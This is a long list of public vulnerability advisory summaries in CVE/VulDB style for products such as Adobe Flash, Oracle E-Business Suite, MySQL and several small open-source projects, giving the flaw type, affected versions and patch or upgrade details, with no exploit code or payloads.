A vulnerability classified as problematic has been found in Arno0x TwoFactorAuth. This affects an unknown part of the file login/login.php. The manipulation of the argument from leads to open redirect. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 8549ad3cf197095f783643e41333586d6a4d0e54. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-223803.
A vulnerability has been found in Ydalb mapicoin up to 1.9.0 and classified as problematic. This vulnerability affects unknown code of the file webroot/stats.php. The manipulation of the argument link/search leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.10.0 is able to address this issue. The patch is identified as 67e87f0f0c1ac238fcd050f4c3db298229bc9679. It is recommended to upgrade the affected component. VDB-223402 is the identifier assigned to this vulnerability.
A vulnerability was found in 3breadt dd-plist 1.17 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. An attack has to be approached locally. Upgrading to version 1.18 is able to address this issue. The patch is identified as 8c954e8d9f6f6863729e50105a8abf3f87fff74c. It is recommended to upgrade the affected component. VDB-221486 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in generator-hottowel 0.0.11. Affected is an unknown function of the file app/templates/src/server/_app.js of the component 404 Error Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is c17092fd4103143a9ddab93c8983ace8bf174396. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221484.
A vulnerability was found in doomsider shadow. It has been classified as problematic. Affected is an unknown function. The manipulation leads to denial of service. Attacking locally is a requirement. The complexity of an attack is rather high. The exploitability is told to be difficult. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as 3332c5ba9ec3014ddc74e2147190a050eee97bc0. It is recommended to apply a patch to fix this issue. VDB-221478 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SiteFusion Application Server up to 6.6.6. This affects an unknown part of the file getextension.php of the component Extension Handler. The manipulation leads to path traversal. Upgrading to version 6.6.7 is able to address this issue. The identifier of the patch is 49fff155c303d6cd06ce8f97bba56c9084bf08ac. It is recommended to upgrade the affected component. The identifier VDB-219765 was assigned to this vulnerability.
A vulnerability was found in mosbth cimage up to 0.7.18. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file check_system.php. The manipulation of the argument $_SERVER['SERVER_SOFTWARE'] leads to cross site scripting. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 0.7.19 is able to address this issue. The patch is named 401478c8393989836beeddfeac5ce44570af162b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-219715.
A vulnerability was found in nickzren alsdb. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version v2 is able to address this issue. The identifier of the patch is cbc79a68145e845f951113d184b4de207c341599. It is recommended to upgrade the affected component. The identifier VDB-218429 was assigned to this vulnerability.
A vulnerability was found in tombh jekbox. It has been rated as problematic. This issue affects some unknown processing of the file lib/server.rb. The manipulation leads to exposure of information through directory listing. The attack may be initiated remotely. The patch is named 64eb2677671018fc08b96718b81e3dbc83693190. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218375.
A vulnerability was found in krail-jpa up to 0.9.1. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version 0.9.2 is able to address this issue. The identifier of the patch is c1e848665492e21ef6cc9be443205e36b9a1f6be. It is recommended to upgrade the affected component. The identifier VDB-218373 was assigned to this vulnerability.
A vulnerability has been found in CESNET theme-cesnet up to 1.x on ownCloud and classified as problematic. Affected by this vulnerability is an unknown functionality of the file cesnet/core/lostpassword/templates/resetpassword.php. The manipulation leads to insufficiently protected credentials. Attacking locally is a requirement. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 2b857f2233ce5083b4d5bc9bfc4152f933c3e4a6. It is recommended to upgrade the affected component. The identifier VDB-217633 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in University of Cambridge django-ucamlookup up to 1.9.1. Affected by this vulnerability is an unknown functionality of the component Lookup Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.9.2 is able to address this issue. The identifier of the patch is 5e25e4765637ea4b9e0bf5fcd5e9a922abee7eb3. It is recommended to upgrade the affected component. The identifier VDB-217441 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as problematic has been found in OpenACS bug-tracker. Affected is an unknown function of the file lib/nav-bar.adp of the component Search. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is aee43e5714cd8b697355ec3bf83eefee176d3fc3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217440.
A vulnerability was found in InfiniteWP Client Plugin 1.5.1.3/1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to injection. The attack can be launched remotely. Upgrading to version 1.6.1.1 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability has been found in FileZilla Client 3.17.0.0 and classified as problematic. This vulnerability affects unknown code of the file C:\Program Files\FileZilla FTP Client\uninstall.exe of the component Installer. The manipulation leads to unquoted search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in MONyog Ultimate 6.63. This affects an unknown part of the component Cookie Handler. The manipulation of the argument HasServerEdit/IsAdmin leads to privilege escalation. It is possible to initiate the attack remotely.
The password-management administration component in Cisco Policy Suite (CPS) 7.0.1.3, 7.0.2, 7.0.2-att, 7.0.3-att, 7.0.4-att, and 7.5.0 allows remote attackers to bypass intended RBAC restrictions and read unspecified data via unknown vectors, aka Bug ID CSCut85211.
Cross-site request forgery (CSRF) vulnerability on KDDI HOME SPOT CUBE devices before 2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
In Android before 2018-04-05 or earlier security patch level on Qualcomm Snapdragon Mobile SD 210/SD 212/SD 205, SD 400, SD 410/12, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 800, SD 808, SD 810, SD 820, and SD 835, RTP daemon crashes and terminates VT call when UE receives RTCP unknown APP packet report which caused the parser to miss an end of RTCP packet length and go on forever looking for it, even going beyond the limits of the RTCP Packet length.
Cross-site request forgery (CSRF) vulnerability in Adobe Connect before 9.5.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the DataStore component in Oracle Berkeley DB 11.2.5.0.32, 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, 12.1.6.0.35, and 12.1.6.1.26 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0682, CVE-2016-0689, CVE-2016-0692, and CVE-2016-3418.
Unspecified vulnerability in the DataStore component in Oracle Berkeley DB 11.2.5.0.32, 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, 12.1.6.0.35, and 12.1.6.1.26 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0682, CVE-2016-0689, CVE-2016-0694, and CVE-2016-3418.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect integrity via unknown vectors, a different vulnerability than CVE-2016-0690.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect integrity via unknown vectors, a different vulnerability than CVE-2016-0691.
Unspecified vulnerability in the DataStore component in Oracle Berkeley DB 11.2.5.0.32, 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, 12.1.6.0.35, and 12.1.6.1.26 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0682, CVE-2016-0692, CVE-2016-0694, and CVE-2016-3418.
Unspecified vulnerability in the DataStore component in Oracle Berkeley DB 11.2.5.0.32, 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, 12.1.6.0.35, and 12.1.6.1.26 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0689, CVE-2016-0692, CVE-2016-0694, and CVE-2016-3418.
Unspecified vulnerability in the RDBMS Security component in Oracle Database Server 12.1.0.1 and 12.1.0.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in Oracle Java SE 7u97, 8u73, and 8u74 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to the Hotspot sub-component.
Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 12.1.4, 12.2.2, and 12.3.2; the Oracle Health Sciences Information Manager component in Oracle Health Sciences Applications 1.2.8.3, 2.0.2.3, and 3.0.1.0; the Oracle Healthcare Master Person Index component in Oracle Health Sciences Applications 2.0.12, 3.0.0, and 4.0.1; the Oracle Documaker component in Oracle Insurance Applications before 12.5; the Oracle Insurance Calculation Engine component in Oracle Insurance Applications 9.7.1, 10.1.2, and 10.2.2; the Oracle Insurance Policy Administration J2EE and Oracle Insurance Rules Palette components in Oracle Insurance Applications 9.6.1, 9.7.1, 10.0.1, 10.1.2, 10.2.0, and 10.2.2; the Oracle Retail Integration Bus component in Oracle Retail Applications 15.0; the Oracle Retail Order Broker component in Oracle Retail Applications 5.1, 5.2, and 15.0; the Primavera Contract Management component in Oracle Primavera Products Suite 14.2; the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.2, 8.3, 8.4, 15.1, 15.2, and 16.1; the Oracle Financial Services Analytical Applications Infrastructure component in Oracle Financial Services Applications 8.0.0, 8.0.1, 8.0.2, and 8.0.3; the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce 3.1.1, 3.1.2, 11.0, 11.1, and 11.2; the Oracle Agile PLM component in Oracle Supply Chain Products Suite 9.3.4 and 9.3.5; the Oracle Communications BRM - Elastic Charging Engine 11.2.0.0.0 and 11.3.0.0.0; the Oracle Enterprise Repository Enterprise Repository 12.1.3.0.0; the Oracle Financial Services Behavior Detection Platform 8.0.1 and 8.0.2; the Oracle Hyperion Essbase 12.2.1.1; the Oracle Tuxedo System and Applications Monitor (TSAM) 11.1.1.2.0, 11.1.1.2.1, 11.1.1.2.1, 12.1.1.1.0, 12.1.3.0.0, and 12.2.2.0.0; the Oracle Communications WebRTC Session Controller component of Oracle Communications Applications (subcomponent: Security (Spring)) 7.0, 7.1 and 7.2; the Oracle Endeca Information Discovery Integrator 3.2; the Converged Commerce component of Oracle Retail Applications 16.0.1; the Oracle Identity Manager 11.1.2.3.0; Oracle Enterprise Manager for MySQL Database 12.1.0.4; Oracle Retail Invoice Matching 12.0, 13.0, 13.1, 13.2, 14.0, and 14.1; Oracle Communications Performance Intelligence Center (PIC) Software Prior to 10.2.1 and the Oracle Knowledge component of Oracle Siebel CRM (subcomponent: AnswerFlow (Spring Framework)) version 8.5.1.0 - 8.5.1.7 and 8.6.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality via unknown vectors related to Zones.
Unspecified vulnerability in the kernel-uek component in Oracle Linux 6 allows local users to affect availability via unknown vectors.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, and 12.2.1.0.0 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and MariaDB before 10.0.22 and 10.1.x before 10.1.9 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to privileges.
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to replication.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect integrity via unknown vectors related to encryption.
Unspecified vulnerability in Oracle MySQL 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Java SE component in Oracle Java SE 6u111, 7u95, 8u71, and 8u72, when running on Windows, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install.  NOTE: the previous information is from Oracle's Security Alert for CVE-2016-0603. Oracle has not commented on third-party claims that this is an untrusted search path issue that allows local users to gain privileges via a Trojan horse dll in the "application directory."
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 5.0.14 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Windows Installer.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that this is an untrusted search path issue that allows local users to gain privileges via a Trojan horse dll in the "application directory."
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Partition.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
Unspecified vulnerability in Oracle MySQL 5.7.9 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows remote authenticated users to affect availability via unknown vectors related to Optimizer.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 4.3.36 and before 5.0.14 allows local users to affect availability via unknown vectors related to Core.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Purchasing component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Supplier Change.
Unspecified vulnerability in the PeopleSoft Enterprise SCM Order Management component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle General Ledger component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to Consolidation Hierarchy Viewer.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53, 8.54, and 8.55 allows remote authenticated users to affect confidentiality via unknown vectors related to File Processing.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to iHelp.
Unspecified vulnerability in the Oracle Report Manager component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6, 12.1.2, 12.1.3, and 12.2.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Coherence Container.
Unspecified vulnerability in the Oracle Balanced Scorecard component in Oracle E-Business Suite 11.5.10.2 and 12.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle HCM Configuration Workbench component in Oracle E-Business Suite 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Email Center component in Oracle E-Business Suite 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Server Components.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Embedded Data Warehouse.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality via unknown vectors related to Deliverables.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0561.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 11.5.10.2 and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Common Techstack.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0564.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0545, CVE-2016-0551, CVE-2016-0552, and CVE-2016-0559.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0545, CVE-2016-0551, CVE-2016-0552, and CVE-2016-0560.
Unspecified vulnerability in the Oracle Service Contracts component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Renewals.
Unspecified vulnerability in the Oracle Advanced Collections component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Administration, a different vulnerability than CVE-2016-0556.
Unspecified vulnerability in the Oracle Advanced Collections component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Administration, a different vulnerability than CVE-2016-0557.
Unspecified vulnerability in the Oracle CADView-3D component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Studio.
Unspecified vulnerability in the Oracle Interaction Center Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Business Intelligence.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0545, CVE-2016-0551, CVE-2016-0559, and CVE-2016-0560.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0545, CVE-2016-0552, CVE-2016-0559, and CVE-2016-0560.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Common Components, a different vulnerability than CVE-2016-0511, CVE-2016-0547, and CVE-2016-0548.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Common Components, a different vulnerability than CVE-2016-0511, CVE-2016-0547, and CVE-2016-0549.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Common Components, a different vulnerability than CVE-2016-0511, CVE-2016-0548, and CVE-2016-0549.
Unspecified vulnerability in Oracle MySQL 5.5.46 and earlier, 5.6.27 and earlier, and 5.7.9 and MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Client.  NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that these are multiple buffer overflows in the mysqlshow tool that allow remote database servers to have unspecified impact via a long table or database name.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2016-0551, CVE-2016-0552, CVE-2016-0559, and CVE-2016-0560.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Architecture.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Preview.
Unspecified vulnerability in the Oracle Field Service component in Oracle E-Business Suite 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect integrity via unknown vectors related to Field Service Map.
Unspecified vulnerability in the Oracle Configurator component in Oracle Supply Chain Products Suite 11.5.10.2, 12.1, and 12.2 allows remote attackers to affect confidentiality via unknown vectors related to UI Servlet, a different vulnerability than CVE-2016-0540.
Unspecified vulnerability in the Oracle Configurator component in Oracle Supply Chain Products Suite 11.5.10.2, 12.1, and 12.2 allows remote attackers to affect confidentiality via unknown vectors related to UI Servlet, a different vulnerability than CVE-2016-0541.
Unspecified vulnerability in the Oracle Report Manager component in Oracle E-Business Suite 11.5.10.2, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Financial Consolidation Hub component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality via unknown vectors related to Business Intelligence.
Unspecified vulnerability in the Oracle Human Resources component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Person.
Unspecified vulnerability in the Oracle Universal Work Queue component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to error messages.
Unspecified vulnerability in the Oracle Project Contracts component in Oracle E-Business Suite 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Printing.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 11.5.10.2 and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Messaging.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 11.5.10.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security Assignments.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Oracle Diagnostics Interfaces.
Unspecified vulnerability in the Oracle CRM Technical Foundation component in Oracle E-Business Suite 11.5.10.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote attackers to affect integrity via unknown vectors related to Wireless Framework.
Unspecified vulnerability in the Oracle Universal Work Queue component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Work Provider Administration.
Unspecified vulnerability in the Oracle Universal Work Queue component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Work Provider Administration.
Unspecified vulnerability in the Oracle Interaction Blending component in Oracle E-Business Suite 11.5.10.2, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Blending Administration.
Unspecified vulnerability in the Oracle Retail Open Commerce Platform Cloud Service component in Oracle Retail Applications 3.5, 4.5, 4.7, and 5.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Framework.
Unspecified vulnerability in the Oracle iProcurement component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to Redirection.
Unspecified vulnerability in the Oracle iReceivables component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to AR Web Utilities, a different vulnerability than CVE-2016-0507.
Unspecified vulnerability in the Oracle Human Resources component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to General utilities, a different vulnerability than CVE-2016-0517.
Unspecified vulnerability in the Oracle Human Resources component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to General utilities, a different vulnerability than CVE-2016-0518.
Unspecified vulnerability in the Oracle Quality component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to QA / Order Management Integration.
Unspecified vulnerability in the Oracle Human Resources component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Self Service - Common Modules.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Common Components, a different vulnerability than CVE-2016-0547, CVE-2016-0548, and CVE-2016-0549.
